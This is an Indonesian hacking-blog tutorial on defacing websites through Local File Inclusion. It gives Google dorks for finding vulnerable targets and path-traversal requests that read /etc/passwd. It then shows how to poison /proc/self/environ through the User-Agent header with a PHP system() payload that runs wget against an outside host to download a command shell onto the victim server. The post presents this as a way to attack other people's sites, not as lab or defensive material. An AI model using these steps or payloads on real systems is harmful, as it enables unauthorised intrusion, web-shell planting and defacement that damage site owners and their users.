Showing themes that are Seo, fast loading, light, fresh and professional.


Assalamualaikum semua,selamat datang di blog JawaBaratCyber.
Oke kali ini saya akan memberikan tutorial deface metode LFI atau Local File inclusion.
Tapi sebelum ke tutorialnya saya ingin menjelaskan dulu apa itu LFI atau Local File inclusion.

Pengertian LFI:
LFI (Local File Inclusion) adalah sebuah bug pada site dimana kita bisa mengakses semua file di dalam server hanya dengan melalui URL.

Cara Deface Website metode Local File Inclusion (LFI):
Untuk mencari target website LFI kalian bisa menggunakan dork di bawah:
  • inurl:/view/lang/index.php?page=?page=
  • inurl:/shared/help.php?page=
  • inurl:index.php?page=?page=
  • inurl:page?=
  • Inurl:index.php?page=
  • Inurl:help.php?page=
  • Inurl:php?page=
  • Dan lain lain (selengkapnya kalian bisa cari di google)
Pertama tama kalian test vuln atau enggaknya tu web contoh:
localhost/index.php?page=contact
kalian ganti contact menjadi ../../
Contoh:
localhost/index.php?page=../../
Jika kalian dapat tulisan eror seperti ini
Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/heker/public_html/index.php on line 1337
Ada kemungkinan anda dapat membuka local file
Oke kalau sudah seperti itu kalian coba panggil file /etc/passwd nya .
Contoh:
localhost/index.php?page=etc/passwd
Kalau masih eror kalian naikan directorinya
Contoh:
localhost/index.php?page=../../../../../etc/passwd
Kalau masih error, naikkan terus direktori nya sampai kebaca.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin 
Sekarang kalian coba panggil apakah proc/self/environ bisa diakses atau tidak.
Kenapa?Karena disini proses inject backdoor akan dimulai.
Contoh
localhost/view.php?page=../../../../../proc/self/environ
Kalau ada tulisan seperti ini:
environDOCUMENT_ROOT=/home/heker/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac HTTP_HOST=localhost HTTP_REFERER=http://localhost/index.php?page=../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15 PATH=/bin:/usr/bin QUERY_STRING=index=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337 REQUEST_METHOD= GET REQUEST_URI = /index.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/hackers/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=heker@site.com SERVER_NAME=localhost SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80
Berarti web tersebut bisa diinject. 
Ok lanjut
Kalau sudah seperti itu aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan 
Contoh:
 <?system(‘wget http://zildan.cf/cmdshell.txt -O zgans.php’);?> 
Lalu kalian submit.
Maka Shell kalian akan terletak di

Localhost/zgans.php

Related Posts

There is no other posts in this category.
Seorang yang memiliki kepribadian yang menyendiri, tanpa mengenal dunia luar hanya melalui dunia online.
  • Facebook
  • WhatsApp
  • Instagram
  • Subscribe Our Newsletter

    Belum ada Komentar untuk "Cara Deface Website metode Local File Inclusion (LFI) | JawaBaratCyber"

    Posting Komentar

    Iklan Atas Artikel

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel